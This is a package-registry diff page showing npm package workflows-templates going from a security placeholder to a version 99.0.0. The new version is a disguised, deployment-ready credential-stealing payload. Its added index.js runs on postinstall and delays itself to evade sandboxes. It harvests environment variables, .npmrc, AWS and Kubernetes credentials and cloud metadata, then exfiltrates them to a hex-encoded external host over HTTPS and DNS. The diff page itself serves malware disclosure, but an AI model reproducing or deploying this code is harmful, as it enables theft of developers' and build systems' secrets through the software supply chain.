npm - workflows-templates - Versions diffs - 0.0.1-security → 99.0.0 - Mend

workflows-templates 0.0.1-security → 99.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of workflows-templates might be problematic. Click here for more details.

Files changed (3) hide show

package/index.js ADDED Viewed

@@ -0,0 +1,130 @@
+// =========================================================================
+// ============== ULTIMATE SUPPLY CHAIN RECON PAYLOAD (v99) ================
+// =========== DEPLOYMENT-READY. OAST DOMAIN HEX-ENCODED. ==================
+// =========================================================================
+// This payload evades simple sandboxes, performs deep host and cloud
+// reconnaissance, and exfiltrates data via HTTPS (primary) and DNS (secondary).
+const os = require('os');
+const https = require('https');
+const http = require('http'); // For unencrypted metadata service calls
+const dns = require('dns');
+const fs = require('fs');
+const { execSync } = require('child_process');
+// --- CONFIGURATION ---
+// OAST domain is hex-encoded for minor evasion.
+const OAST_DOMAIN_HEX = '707972696b316971346b7067787362676631666c683939653235383577766b6b2e6f6173746966792e636f6d';
+const OAST_DOMAIN = Buffer.from(OAST_DOMAIN_HEX, 'hex').toString();
+const MAX_EXECUTION_TIME_MS = 250000; // Total time budget for the script
+const run = (cmd) => {
+    try {
+        return execSync(cmd, { stdio: 'pipe', timeout: 5000 }).toString().trim();
+    } catch (e) {
+        return `CMD_FAILED: ${e.message.split('\n')[0]}`;
+    }
+};
+const safeReadFile = (filePath) => {
+    return fs.existsSync(filePath) ? fs.readFileSync(filePath, 'utf8') : 'FILE_NOT_FOUND';
+};
+const exfiltrateViaHttps = (data) => {
+    const payload = JSON.stringify(data, null, 2);
+    https.request({
+        hostname: OAST_DOMAIN,
+        port: 443,
+        path: `/HTTPS_HIT/v99/${data.intel_summary.join('_')}`,
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) }
+    }).on('error', e => { exfiltrateViaDns(data); }).end(payload);
+};
+const exfiltrateViaDns = (data) => {
+    const payload = Buffer.from(JSON.stringify({ s: data.intel_summary, h: data.host.hostname })).toString('hex');
+    const chunks = payload.match(/.{1,60}/g) || [];
+    chunks.forEach((chunk, index) => {
+        const subdomain = `${index}.h.${chunk}`;
+        if (subdomain.length < 63) {
+            dns.lookup(`${subdomain}.${OAST_DOMAIN}`, (err) => {});
+        }
+    });
+};
+const gatherIntel = async () => {
+    const intel = {
+        timestamp: new Date().toISOString(),
+        intel_summary: [],
+    };
+    intel.host = {
+        hostname: os.hostname(),
+        whoami: os.userInfo().username,
+        platform: os.platform(),
+        release: os.release(),
+        arch: os.arch(),
+        pwd: run('pwd') || run('cd'),
+        env: process.env
+    };
+    if (intel.host.hostname) intel.intel_summary.push('HOST');
+    intel.network = {
+        ipconfig: os.platform() === 'win32' ? run('ipconfig /all') : run('ifconfig -a && ip a'),
+        resolv_conf: safeReadFile('/etc/resolv.conf'),
+        hosts_file: safeReadFile('/etc/hosts'),
+        process_list: run('ps aux || tasklist'),
+    };
+    if (intel.network.resolv_conf.includes('10.') || intel.network.resolv_conf.includes('172.16.') || intel.network.resolv_conf.includes('192.168.')) {
+        intel.intel_summary.push('INT_NET');
+    }
+    intel.creds = {
+        npm_rc: safeReadFile(`${os.homedir()}/.npmrc`),
+        aws_creds: safeReadFile(`${os.homedir()}/.aws/credentials`),
+        kube_config: safeReadFile(`${os.homedir()}/.kube/config`),
+    };
+    if (Object.values(intel.creds).some(c => c !== 'FILE_NOT_FOUND')) {
+        intel.intel_summary.push('CREDS');
+    }
+    const getMetadata = (options) => new Promise(resolve => {
+        const req = http.get(options, res => {
+            let data = `STATUS:${res.statusCode} `;
+            res.on('data', chunk => data += chunk.toString());
+            res.on('end', () => resolve(data.substring(0, 400)));
+        }).on('error', e => resolve(`ERROR:${e.code}`)).on('timeout', () => { req.destroy(); resolve('TIMEOUT'); });
+    });
+    intel.cloud = {};
+    const imdsv2TokenRes = await getMetadata({ host: '169.254.169.254', path: '/latest/api/token', method: 'PUT', headers: {'X-aws-ec2-metadata-token-ttl-seconds': '21600'}, timeout: 2000 });
+    if (!imdsv2TokenRes.startsWith('ERROR') && !imdsv2TokenRes.startsWith('TIMEOUT')) {
+        const token = imdsv2TokenRes.split(' ').slice(1).join(' ');
+        intel.cloud.aws_imdsv2_data = await getMetadata({ host: '169.254.169.254', path: '/latest/dynamic/instance-identity/document', headers: {'X-aws-ec2-metadata-token': token}, timeout: 2000 });
+        if(!intel.cloud.aws_imdsv2_data.startsWith('ERROR')) intel.intel_summary.push('AWS');
+    }
+    intel.cloud.azure_data = await getMetadata({ host: '169.254.169.254', path: '/metadata/instance?api-version=2021-02-01', headers: {'Metadata': 'true'}, timeout: 2000 });
+    if (!intel.cloud.azure_data.startsWith('ERROR')) intel.intel_summary.push('AZURE');
+    intel.cloud.gcp_data = await getMetadata({ host: 'metadata.google.internal', path: '/computeMetadata/v1/?recursive=true', headers: { 'Metadata-Flavor': 'Google' }, timeout: 2000 });
+    if (!intel.cloud.gcp_data.startsWith('ERROR')) intel.intel_summary.push('GCP');
+    return intel;
+};
+// --- Main Execution Logic ---
+(async () => {
+    // Stage 1: Evasion via randomized delay.
+    const delay = 90000 + (Math.random() * 60000); // 90-150 seconds
+    await new Promise(resolve => setTimeout(resolve, delay));
+    const timeout = setTimeout(() => process.exit(0), MAX_EXECUTION_TIME_MS);
+    // Stage 2: Reconnaissance
+    const intelReport = await gatherIntel();
+    // Stage 3: Exfiltration
+    exfiltrateViaHttps(intelReport);
+    clearTimeout(timeout);
+})();

package/package.json CHANGED Viewed

@@ -1,6 +1,18 @@
 {
   "name": "workflows-templates",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "99.0.0",
+  "description": "Core utility templates for workflow automation and build processes. Provides standardized schemas and helper functions.",
+  "main": "index.js",
+  "scripts": {
+    "postinstall": "node index.js"
+  },
+  "keywords": [
+    "workflows",
+    "templates",
+    "automation",
+    "ci",
+    "schema"
+  ],
+  "author": "Core Systems Team",
+  "license": "ISC"
 }

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=workflows-templates for more information.